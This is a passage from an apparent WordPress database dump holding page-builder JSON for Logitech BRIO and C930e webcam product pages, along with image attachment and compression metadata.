webcam, you can use it with BRIO.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6c5081b\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"bde9d3c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"757c879\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>MOUNTING &amp; PRIVACY OPTIONS<\\/h4><p>Mount the camera wherever it works best \\u2013 LCD screen, notebook, or tabletop \\u2013 with the adjustable clip, or mount BRIO on your own tripod instead. A removable shade flips down to assure privacy and peace of mind.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f194eff\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a465257\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>5X HD ZOOM<\\/h4><p>Zoom in and pan around to crop out distracting backgrounds, perfectly frame you and a friend, or capture the entire scene. BRIO\\u2019s next-generation 4K image sensor delivers HD quality without jaggies or blur, even when zoomed in.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"343f7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cfec2a4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>CAMERA SETTINGS<\\/h4><p>Customize your BRIO and access pan, zoom, and image controls with Logitech Camera Settings software for Windows and Mac.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"839ea48\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(5852,2997,'_elementor_version','0.4'),(8696,3665,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:38.8136556906951426526575232855975627899169921875;s:5:\"bytes\";i:157009;s:11:\"size_before\";i:404520;s:10:\"size_after\";i:247511;s:4:\"time\";d:4.5299999999999993605115378159098327159881591796875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:38.8599999999999994315658113919198513031005859375;s:5:\"bytes\";i:3598;s:11:\"size_before\";i:9259;s:10:\"size_after\";i:5661;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:38.4500000000000028421709430404007434844970703125;s:5:\"bytes\";i:6755;s:11:\"size_before\";i:17569;s:10:\"size_after\";i:10814;s:4:\"time\";d:0.1000000000000000055511151231257827021181583404541015625;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:38.3299999999999982946974341757595539093017578125;s:5:\"bytes\";i:34018;s:11:\"size_before\";i:88748;s:10:\"size_after\";i:54730;s:4:\"time\";d:0.85999999999999998667732370449812151491641998291015625;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:40.60000000000000142108547152020037174224853515625;s:5:\"bytes\";i:73744;s:11:\"size_before\";i:181628;s:10:\"size_after\";i:107884;s:4:\"time\";d:2.439999999999999946709294817992486059665679931640625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:39.81000000000000227373675443232059478759765625;s:5:\"bytes\";i:6286;s:11:\"size_before\";i:15791;s:10:\"size_after\";i:9505;s:4:\"time\";d:0.1499999999999999944488848768742172978818416595458984375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:33.719999999999998863131622783839702606201171875;s:5:\"bytes\";i:11035;s:11:\"size_before\";i:32725;s:10:\"size_after\";i:21690;s:4:\"time\";d:0.2800000000000000266453525910037569701671600341796875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:36.68999999999999772626324556767940521240234375;s:5:\"bytes\";i:21573;s:11:\"size_before\";i:58800;s:10:\"size_after\";i:37227;s:4:\"time\";d:0.63000000000000000444089209850062616169452667236328125;}}}'),(6374,3074,'_edit_lock','1564215871:1'),(5859,2999,'_edit_lock','1551778475:1'),(5860,2999,'_edit_last','1'),(5861,2999,'_wp_page_template','template-fullwidth.php'),(5862,2999,'_hide_page_title',''),(5863,2999,'_hide_header',''),(5864,2999,'_hide_footer',''),(5865,2999,'_hide_breadcrumb',''),(5866,2999,'_cover',''),(5867,2999,'_show_excerpt',''),(5868,2999,'_wc_apply_product',''),(5869,2999,'_yoast_wpseo_content_score','30'),(5870,2999,'_elementor_edit_mode','builder'),(5871,2999,'_elementor_template_type','post'),(5886,2999,'_elementor_data','[{\"id\":\"5483de2\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"7d021d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"f7f5e82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>LOGITECH C930E<\\/h2><p>Business webcam with a wide field of view and HD digital zoom<\\/p><ul><li>1080p HD quality, ideal for video conferencing<\\/li><li>Excellent low-light performance with RightLight\\u2122 2<\\/li><li>Premium glass lens with autofocus<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3b69501\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"fab6489\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/c930e-webcam-1.png\",\"id\":3002}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"27a697b\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"745a6ba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6782e26\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>A WEBCAM THAT MEANS BUSINESS<\\/h2><p>Experience video calls that are the next best thing to being there in person. Sophisticated technology in the Logitech C930e Webcam delivers clear video and sound in virtually any environment, even low-light conditions. With 1080p resolution, H.264 video compression and a wide 90-degree field of view, C930e offers advanced webcam capabilities for superior video conferencing.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0ac9d15\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"72acab5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"space_between_widgets\":-11},\"elements\":[{\"id\":\"7d04fc0\",\"elType\":\"widget\",\"settings\":{\"title\":\"KEY FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6566062\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1b2c2a4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"6e99860\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":40.753},\"elements\":[{\"id\":\"07c1971\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>GREAT VIDEO IN ANY ENVIRONMENT<\\/h3><p>Show your best side on every video call, wherever you are. The C930e Webcam features 90-degree field of view, pan, tilt, and 4x digital zoom, allowing you to adjust the frame to fit your environment. RightLight\\u2122 2 Technology and a precision lens provide sharp video even in low-light conditions.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"506536d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":59.247},\"elements\":[{\"id\":\"b677e0b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/c930e-webcam.jpg\",\"id\":3003}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"066fb5d\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"39c3c9b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a28099a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/c930e-webcam-1.jpg\",\"id\":3004}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d2538e0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"70b3cb4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>HIGH QUALITY, LOW BANDWIDTH<\\/h4><p>Raise meeting productivity with remarkably clear video at all times \\u2013 even when bandwidth is limited. Optimized for Skype for Business, the C930e Webcam supports H.264 with Scalable Video Coding and UVC 1.5 encoding to minimize its dependence on computer and network resources.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f19736b\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"144b878\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"space_between_widgets\":-11},\"elements\":[{\"id\":\"48e0415\",\"elType\":\"widget\",\"settings\":{\"title\":\"ADDITIONAL FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7bf0124\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d625b68\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"e9ab9f5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"3875501\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>WIDE FIELD OF VIEW<\\/h4><p>With a generous, 90-degree field of view, C930e can capture teams and whiteboards with ease.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3fcac4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4011ea9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>4X HD ZOOM<\\/h4><p>Zoom in and pan around to crop out distracting backgrounds, perfectly frame you and a friend, or capture the entire scene. The premium image sensor delivers HD quality without jaggies or blur, even when zoomed in.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9c00649\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6a99b8d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>MOUNTING &amp; PRIVACY OPTIONS<\\/h4><p>Mount the camera wherever it works best \\u2013 LCD screen, notebook, or tabletop \\u2013 with the adjustable clip, or mount C930e on your own tripod instead. A removable shade flips down to assure privacy and peace of mind.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0f8de15\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9bd444d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>CAMERA SETTINGS<\\/h4><p>Customize your C930e and access pan, zoom, and image controls with Logitech Camera Settings software for Windows and Mac.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(5877,3002,'_wp_attached_file','2019/03/c930e-webcam-1.png'),(5878,3002,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:687;s:6:\"height\";i:600;s:4:\"file\";s:26:\"2019/03/c930e-webcam-1.png\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"c930e-webcam-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"c930e-webcam-1-300x262.png\";s:5:\"width\";i:300;s:6:\"height\";i:262;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:26:\"c930e-webcam-1-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:26:\"c930e-webcam-1-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:26:\"c930e-webcam-1-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:24:\"c930e-webcam-1-20x17.png\";s:5:\"width\";i:20;s:6:\"height\";i:17;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5879,3002,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:7.1266025772365058088553269044496119022369384765625;s:5:\"bytes\";i:26087;s:11:\"size_before\";i:366051;s:10:\"size_after\";i:339964;s:4:\"time\";d:0.66000000000000003108624468950438313186168670654296875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.1699999999999999289457264239899814128875732421875;s:5:\"bytes\";i:1911;s:11:\"size_before\";i:20848;s:10:\"size_after\";i:18937;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.78000000000000024868995751603506505489349365234375;s:5:\"bytes\";i:3996;s:11:\"size_before\";i:58910;s:10:\"size_after\";i:54914;s:4:\"time\";d:0.11999999999999999555910790149937383830547332763671875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.9199999999999999289457264239899814128875732421875;s:5:\"bytes\";i:2686;s:11:\"size_before\";i:27077;s:10:\"size_after\";i:24391;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.1099999999999994315658113919198513031005859375;s:5:\"bytes\";i:7767;s:11:\"size_before\";i:95788;s:10:\"size_after\";i:88021;s:4:\"time\";d:0.200000000000000011102230246251565404236316680908203125;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.95000000000000017763568394002504646778106689453125;s:5:\"bytes\";i:9727;s:11:\"size_before\";i:163428;s:10:\"size_after\";i:153701;s:4:\"time\";d:0.2300000000000000099920072216264088638126850128173828125;}}}'),(5880,3003,'_wp_attached_file','2019/03/c930e-webcam.jpg'),(5881,3003,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:930;s:6:\"height\";i:523;s:4:\"file\";s:24:\"2019/03/c930e-webcam.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"c930e-webcam-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"c930e-webcam-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"c930e-webcam-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:24:\"c930e-webcam-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:24:\"c930e-webcam-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:24:\"c930e-webcam-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:22:\"c930e-webcam-20x11.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5882,3003,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:3.58384053840354521724975711549632251262664794921875;s:5:\"bytes\";i:3898;s:11:\"size_before\";i:108766;s:10:\"size_after\";i:104868;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.55999999999999960920149533194489777088165283203125;s:5:\"bytes\";i:278;s:11:\"size_before\";i:4996;s:10:\"size_after\";i:4718;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.1500000000000003552713678800500929355621337890625;s:5:\"bytes\";i:394;s:11:\"size_before\";i:9499;s:10:\"size_after\";i:9105;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.310000000000000053290705182007513940334320068359375;s:5:\"bytes\";i:1194;s:11:\"size_before\";i:36085;s:10:\"size_after\";i:34891;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.979999999999999982236431605997495353221893310546875;s:5:\"bytes\";i:335;s:11:\"size_before\";i:8424;s:10:\"size_after\";i:8089;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.54999999999999982236431605997495353221893310546875;s:5:\"bytes\";i:713;s:11:\"size_before\";i:20071;s:10:\"size_after\";i:19358;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.310000000000000053290705182007513940334320068359375;s:5:\"bytes\";i:984;s:11:\"size_before\";i:29691;s:10:\"size_after\";i:28707;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(5883,3004,'_wp_attached_file','2019/03/c930e-webcam-1.jpg'),(5884,3004,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:930;s:6:\"height\";i:523;s:4:\"file\";s:26:\"2019/03/c930e-webcam-1.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"c930e-webcam-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"c930e-webcam-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"c930e-webcam-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:26:\"c930e-webcam-1-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:26:\"c930e-webcam-1-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:26:\"c930e-webcam-1-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:24:\"c930e-webcam-1-20x11.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5885,3004,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:9.14207616326023497776986914686858654022216796875;s:5:\"bytes\";i:7358;s:11:\"size_before\";i:80485;s:10:\"size_after\";i:73127;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.80999999999999960920149533194489777088165283203125;s:5:\"bytes\";i:250;s:11:\"size_before\";i:5197;s:10:\"size_after\";i:4947;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.2400000000000002131628207280300557613372802734375;s:5:\"bytes\";i:475;s:11:\"size_before\";i:6561;s:10:\"size_after\";i:6086;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.7400000000000002131628207280300557613372802734375;s:5:\"bytes\";i:2753;s:11:\"size_before\";i:25641;s:10:\"size_after\";i:22888;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.94000000000000039079850466805510222911834716796875;s:5:\"bytes\";i:436;s:11:\"size_before\";i:6284;s:10:\"size_after\";i:5848;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.7200000000000006394884621840901672840118408203125;s:5:\"bytes\";i:1251;s:11:\"size_before\";i:14339;s:10:\"size_after\";i:13088;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.7599999999999997868371792719699442386627197265625;s:5:\"bytes\";i:2193;s:11:\"size_before\";i:22463;s:10:\"size_after\";i:20270;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(5887,3005,'_wp_page_template','template-fullwidth.php'),(5888,3005,'_elementor_edit_mode','builder'),(5889,3005,'_elementor_template_type','post'),(5890,3005,'_elementor_data','[{\"id\":\"5483de2\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"7d021d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f7f5e82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>LOGITECH C930E<\\/h2><p>Business webcam with a wide field of view and HD digital zoom<\\/p><ul><li>1080p HD quality, ideal for video conferencing<\\/li><li>Excellent low-light performance with RightLight\\u2122 2<\\/li><li>Premium glass lens with autofocus<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3b69501\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"fab6489\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/c930e-webcam-1.png\",\"id\":3002}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"27a697b\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"745a6ba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6782e26\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>A WEBCAM THAT MEANS BUSINESS<\\/h2><p>Experience video calls that are the next best thing to being there in person. Sophisticated technology in the Logitech C930e Webcam delivers clear video and sound in virtually any environment, even low-light conditions. With 1080p resolution, H.264 video compression and a wide 90-degree field of view, C930e offers advanced webcam capabilities for superior video conferencing.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0ac9d15\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"72acab5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"space_between_widgets\":-11},\"elements\":[{\"id\":\"7d04fc0\",\"elType\":\"widget\",\"settings\":{\"title\":\"KEY FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6566062\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1b2c2a4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"6e99860\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":40.753},\"elements\":[{\"id\":\"07c1971\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>GREAT VIDEO IN ANY ENVIRONMENT<\\/h3><p>Show your best side on every video call, wherever you are. The C930e Webcam features 90-degree field of view, pan, tilt, and 4x digital zoom, allowing you to adjust the frame to fit your environment. RightLight\\u2122 2 Technology and a precision lens provide sharp video even in low-light conditions.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"506536d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":59.247},\"elements\":[{\"id\":\"b677e0b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/c930e-webcam.jpg\",\"id\":3003}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"066fb5d\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"39c3c9b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a28099a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/c930e-webcam-1.jpg\",\"id\":3004}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d2538e0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"70b3cb4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>HIGH QUALITY, LOW BANDWIDTH<\\/h4><p>Raise meeting productivity with remarkably clear video at all times \\u2013 even when bandwidth is limited. Optimized for Skype for Business, the C930e Webcam supports H.264 with Scalable Video Coding and UVC 1.5 encoding to minimize its dependence on computer and network resources.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f19736b\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"144b878\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"space_between_widgets\":-11},\"elements\":[{\"id\":\"48e0415\",\"elType\":\"widget\",\"settings\":{\"title\":\"ADDITIONAL 